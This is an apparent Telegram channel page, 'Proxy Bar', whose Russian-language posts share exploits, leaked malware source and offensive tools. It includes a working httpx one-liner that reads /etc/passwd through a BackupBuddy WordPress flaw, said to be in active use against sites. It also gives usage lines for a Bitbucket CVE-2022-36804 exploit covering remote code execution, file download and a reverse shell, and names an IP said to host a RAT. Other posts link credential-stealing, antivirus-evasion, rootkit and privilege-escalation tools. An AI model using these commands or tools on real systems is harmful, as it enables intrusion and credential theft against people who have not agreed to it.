Proxy Bar – Telegram
Proxy Bar
19.6K subscribers
1.29K photos
79 videos
664 files
1.33K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Ну ка быстро признались, чей RATник ?
hXXp://188.227.57.46/folder/
MSI
CORE
report

#malware
👍9😱6
На xss.is слили в сеть исходники Taurus/Predator The Thief
Тред\исходники

#malware
👍2
Malware development: persistence - part 1. Registry run keys. C++ example.
Read

#walware #windows
😱3👍1
Wordpress vuln\CVE
plugin: BackupBuddy
*
cat hosts |httpx -noscript -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"
*
Уже неделю активно используется для похека wordpress хостов
#wordpress #cve
🔥8👍5
Злой Putty, корейская морковка, работа_мечты_Amazon.iso и троян AIRDRY.V2'
Не понятно ? тогда читаем расследование от bleepingcomputer.com
👍7
gitea_exploit_metasploit_module.rb
9.1 KB
Gitea - Remote Code Execution (for version 1.16.6)
CVE-2022-30781 - описание

#exploit
👍3😱2
CVE-2022-27925-zimbra_Revshell.zip
3.8 KB
Мы уже постили exploit для CVE-2022-27925 (zimbra)
Вот тот же сплоит, только с реализацией reverseShell (для ленивых)
😋
🔥6
админам на заметку:
Как быстро раcпарсить RDP логи и понять как авторизовался удаленный юзер (kerberos или NTLM)
Download get-RdpLogonEvent.ps1

#windows #rdp
👍10
secretscanner.noscript
262.3 KB
SecretScanner
Ищем секреты в образах контейнеров или файловых системах.
*
Инструмент автономный, ищет контейнеры и файловые системы хоста, после чего сравнивает найденное с со своей базой данных, в которой на данный момент около 140 секретных типов
Download

#docker #security
👍2
This media is not supported in your browser
VIEW IN TELEGRAM
pamspy - Воруем учетки в Linux используя eBPF
PAM модулями пользуются многие приложения для аутентификации (sudo, sshd, passwd и так далее), и статей по теме заBACKDOORивания PAM модулей в инете предостаточно.
*
pamspy подгружает пользовательскую программу eBPF, чтобы перехватить функцию pam_get_authtok из libpam.so. И каждый раз когда условный пользователь пытается пройти аутентификацию он дергает pam_get_authtok - тут то pamspy выдернет пароль !
*
DOWNLOAD ——-> pamspy

#linux #pam
🔥2👍1
Cobalt Strike: и его payloads
Разбираемся что и как, анализируем и декодируем. Хорошая статья, рекомендую !
Read

#cobaltstrike
👍1
CVE-2022-36804-PoC-bitbucket.zip
6.5 KB
CVE-2022-36804 - Bitbucket
Для versions <8.3.1 (так как патч уже выпущен)
Сплоит ищет общедоступные репы на хосте
Bitbucket

для исполнения уязвимости.
*
Если открытой репы нет, то требуется действительный файл cookie BITBUCKETSESSIONID.
*
RCE (Remote Code Execution)
CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/

Download /etc/passwd
CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/

Reverse_shell
CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/

#bitbucket
👍1
ANSIBLE - CVE-2022-2568
LPE exploit download
На фоне печальных новостей про CobaltStrike, некоторые ребята задаются вопросом: "А может заменить этот платный кобальт на что то другое ?"
И такой инструмент ЕСТЬ !
*
Sliver (кроссплатфоменный, опенсорсный, активно развивается)
*
Download\скачать Sliver
Site: Sliver
Video guides: lesson-1, lesson-2, lesson-3
Book: в тему поста тут

😎☠️🎃
🔥5👍3😱1
В виду снижения общего уровня интеллекта, мы выпустили книгу)))
👍21😱5
РуткитоПисателям под windows на заметку !
Custom Kernel Signers

#windows #drivers #rootkit
dll4shell
C++ shellcode launcher
Коллекция оболочек DLL для разных методов внедрения шелл-кода и обфускации (AV bypass).
Основано на реальных событиях на charlotte
DownLoad dll4shell
👍5
cve-2022-39197
Та самая XSS найденная в Cobalt Strike 4.7
Еще раз прочитать про дырку
Скачать exploit

#cobaltstrike #exploit
👍4
О чем говорит ЦРУ ?!
The Langley Files: A CIA Podcast
Послушать что там несёт директор ЦРУ Уильям Дж. Бернс можно тут )))))

#CIA
Acunetix_14.9.220830118_linux.7z
250.8 MB
Acunetix 14.9.220830118
linux version

#acunetix
🔥7
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2022-30206
Опять windows, опять print spooler, опять LPE
download exploit

#windows #lpe
😱8👍3